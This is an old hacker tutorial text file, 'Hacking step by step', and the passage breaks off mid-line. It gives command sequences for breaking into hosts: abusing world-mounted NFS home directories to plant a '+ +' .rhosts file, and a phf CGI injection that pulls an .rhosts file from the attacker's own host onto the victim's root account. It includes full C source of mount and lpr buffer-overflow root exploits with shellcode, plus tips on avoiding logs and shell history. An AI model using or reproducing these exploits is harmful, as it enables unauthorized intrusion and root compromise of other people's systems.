User's guide
__________________________
Well,
howdi folks... I guess you are all wondering who's this
guy (me)
that's
trying to show you a bit of everything... ?
Well,
I ain't telling you anything of that...
Copyright,
and other stuff like this (below).
Copyright
and stuff...
______________________
If
you feel offended by this subject (hacking) or you think
that you could
do
better, don't read the below information...
This
file is for educational purposes ONLY...;)
I
ain't responsible for any damages you made after reading
this...(I'm very
serious...)
So
this can be copied, but not modified (send me the changes,
and if they
are
good, I'll include them ).
Don't
read it, 'cuz it might be illegal.
I
warned you...
If
you would like to continue, press <PgDown>.
Intro: Hacking step by step.
_________________________________________________________________________________
Well,
this ain't exactely for begginers, but it'll have to
do.
What
all hackers has to know is that there are 4 steps in
hacking...
Step
1: Getting access to site.
Step
2: Hacking r00t.
Step
3: Covering your traces.
Step
4: Keeping that account.
Ok.
In the next pages we'll see exactely what I ment.
Step
1: Getting access.
_______
Well
folks, there are several methods to get access to a
site.
I'll
try to explain the most used ones.
The
first thing I do is see if the system has an export
list:
mysite:~>/usr/sbin/showmount
-e victim.site.com
RPC:
Program not registered.
If
it gives a message like this one, then it's time to
search another way
in.
What
I was trying to do was to exploit an old security problem
by most
SUN
OS's that could allow an remote attacker to add a .rhosts
to a users
home
directory... (That was possible if the site had mounted
their home
directory.
Let's
see what happens...
mysite:~>/usr/sbin/showmount
-e victim1.site.com
/usr
victim2.site.com
/home
(everyone)
/cdrom
(everyone)
mysite:~>mkdir
/tmp/mount
mysite:~>/bin/mount
-nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls
-sal /tmp/mount
total 9
1 drwxrwxr-x 8 root root 1024 Jul
4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct
8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22
19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12
14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul
6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15
12:24 paul/
1 -rw------- 1 root root 242 Mar
9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct
8 21:05 test/
1 drwx------ 15 102 100 1024 Oct 20
18:57 rapper/
Well,
we wanna hack into rapper's home.
mysite:~>id
uid=0
euid=0
mysite:~>whoami
root
mysite:~>echo
"rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd
We
use /bin/csh 'cuz bash leaves a (Damn!) .bash_history
and you might
forget
it on the remote server...
mysite:~>su
- rapper
Welcome
to rapper's user.
mysite:~>ls
-lsa /tmp/mount/
total 9
1 drwxrwxr-x 8 root root 1024 Jul
4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct
8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22
19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12
14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul
6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15
12:24 paul/
1 -rw------- 1 root root 242 Mar
9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct
8 21:05 test/
1 drwx------ 15 rapper daemon 1024 Oct 20
18:57 rapper/
So
we own this guy's home directory...
mysite:~>echo
"+ +" > rapper/.rhosts
mysite:~>cd
/
mysite:~>rlogin
victim1.site.com
Welcome
to Victim.Site.Com.
SunOs
ver....(crap).
victim1:~$
This
is the first method...
Another
method could be to see if the site has an open 80 port.
That would
mean
that the site has a web page.
(And
that's very bad, 'cuz it usually it's vulnerable).
Below
I include the source of a scanner that helped me when
NMAP wasn't written.
(Go
get it at http://www.dhp.com/~fyodor. Good job, Fyodor).
NMAP
is a scanner that does even stealth scanning, so lots
of systems won't
record
it.
/*
-*-C-*- tcpprobe.c */
/*
tcpprobe - report on which tcp ports accept connections
*/
/*
IO ERROR, error@axs.net, Sep 15, 1995 */
#include
<stdio.h>
#include
<sys/socket.h>
#include
<netinet/in.h>
#include
<errno.h>
#include
<netdb.h>
#include
<signal.h>
int
main(int argc, char **argv)
{
int probeport = 0;
struct hostent *host;
int err, i, net;
struct sockaddr_in sa;
if (argc != 2) {
printf("Usage: %s hostname\n", argv[0]);
exit(1);
}
for (i = 1; i < 1024; i++) {
strncpy((char *)&sa, "", sizeof sa);
sa.sin_family = AF_INET;
if (isdigit(*argv[1]))
sa.sin_addr.s_addr = inet_addr(argv[1]);
else if ((host = gethostbyname(argv[1])) != 0)
strncpy((char *)&sa.sin_addr, (char *)host->h_addr,
sizeof sa.sin_addr);
else {
herror(argv[1]);
exit(2);
}
sa.sin_port = htons(i);
net = socket(AF_INET, SOCK_STREAM, 0);
if (net < 0) {
perror("\nsocket");
exit(2);
}
err = connect(net, (struct sockaddr *) &sa, sizeof
sa);
if (err < 0) {
printf("%s %-5d %s\r", argv[1], i, strerror(errno));
fflush(stdout);
} else {
printf("%s %-5d accepted.
\n", argv[1], i);
if (shutdown(net, 2) < 0) {
perror("\nshutdown");
exit(2);
}
}
close(net);
}
printf("
\r");
fflush(stdout);
return (0);
}
Well,
now be very carefull with the below exploits, because
they usually get
logged.
Besides,
if you really wanna get a source file from /cgi-bin/
use this
sintax
: lynx http://www.victim1.com//cgi-bin/finger
If
you don't wanna do that, then do a :
mysite:~>echo
"+ +" > /tmp/rhosts
mysite:~>echo
"GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+
/root/.rhosts"
| nc -v - 20 victim1.site.com 80
then
mysite:~>rlogin
-l root victim1.site.com
Welcome
to Victim1.Site.Com.
victim1:~#
Or,
maybe, just try to find out usernames and passwords...
The
usual users are "test", "guest", and maybe the owner
of the site...
I
usually don't do such things, but you can...
Or
if the site is really old, use that (quote site exec)
old bug for
wu.ftpd.
There
are a lot of other exploits, like the remote exploits
(innd, imap2,
pop3,
etc...) that you can find at rootshell.connectnet.com
or at
dhp.com/~fyodor.
Enough
about this topic. (besides, if you can finger the site,
you can
figgure
out usernames and maybe by guessing passwords (sigh!)
you could get
access
to the site).
Step
2: Hacking r00t.
______
First
you have to find the system it's running...
a).
LINUX
ALL
versions:
A
big bug for all linux versions is mount/umount and (maybe)
lpr.
/*
Mount Exploit for Linux, Jul 30 1996
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$'
`````````"":::::::::
:::::'.g#S$$"$$S#n.
.g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
:::::
$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$
$$$$$$ ::::::
:::::
$$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$
$$$$$$ ::::::
:::::
$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$
$$$$$$ ::::::
:::::
$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$
$$$$$$ ::::::
:::::
$$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$
$$$$$$ ::::::
::::::`S$$$$s$$$$S'
`S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::
Discovered
and Coded by Bloodmask & Vio
Covin
Security 1996
*/
#include
<unistd.h>
#include
<stdio.h>
#include
<stdlib.h>
#include
<fcntl.h>
#include
<sys/stat.h>
#define
PATH_MOUNT "/bin/mount"
#define
BUFFER_SIZE 1024
#define
DEFAULT_OFFSET 50
u_long
get_esp()
{
__asm__("movl %esp, %eax");
}
main(int
argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i;
int ofs = DEFAULT_OFFSET;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
/* fill start of buffer with nops */
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
(void)alarm((u_int)0);
printf("Discovered and Coded by Bloodmask and Vio, Covin
1996\n");
execl(PATH_MOUNT, "mount", buff, NULL);
}
/*LPR
exploit:I don't know the author...*/
#include
<stdio.h>
#include
<stdlib.h>
#include
<unistd.h>
#define
DEFAULT_OFFSET 50
#define
BUFFER_SIZE 1023
long
get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
void
main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
b.)
Version's 1.2.* to 1.3.2
NLSPATH
env. variable exploit:
/*
It's really annoying for users and good for me...
AT
exploit gives only uid=0 and euid=your_usual_euid.
*/
#include
<unistd.h>
#include
<stdio.h>
#include
<stdlib.h>
#include
<fcntl.h>
#include
<sys/stat.h>
#define
path "/usr/bin/at"
#define
BUFFER_SIZE 1024
#d
|
